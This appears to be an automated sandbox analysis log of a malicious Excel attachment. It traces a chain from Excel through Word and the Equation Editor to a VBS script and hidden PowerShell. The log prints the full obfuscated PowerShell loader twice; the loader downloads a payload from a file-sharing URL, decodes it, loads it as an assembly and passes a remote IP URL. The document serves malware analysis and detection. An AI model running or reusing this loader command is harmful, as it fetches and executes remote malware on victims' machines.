    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.1.4................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................`.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............:..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d...............L..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............Y..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............y..........................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.8.0................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................`.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d...............0..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............<..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.5.7................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............,..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............:..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............M..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............Y..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............k..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............w..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................j.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................U.n.a.b.l.e. .t.o. .f.i.n.d. .t.y.p.e. .[.d.n.l.i.b...I.O...H.o.m.e.]...................H.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.3.8.............................m.e.]...................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............$.......................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............0.......................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............B.......................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............N.......................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............`.......................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............l.......................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .u.n.t.i.m.e.E.x.c.e.p.t.i.o.n.....~.......................m.e.]...................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...................T.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.7.1................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..............."..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............@..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............L..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............^..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............j..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............|..........................s....................`.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Pedido No 4500924462.xlsReversingLabs: Detection: 23%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
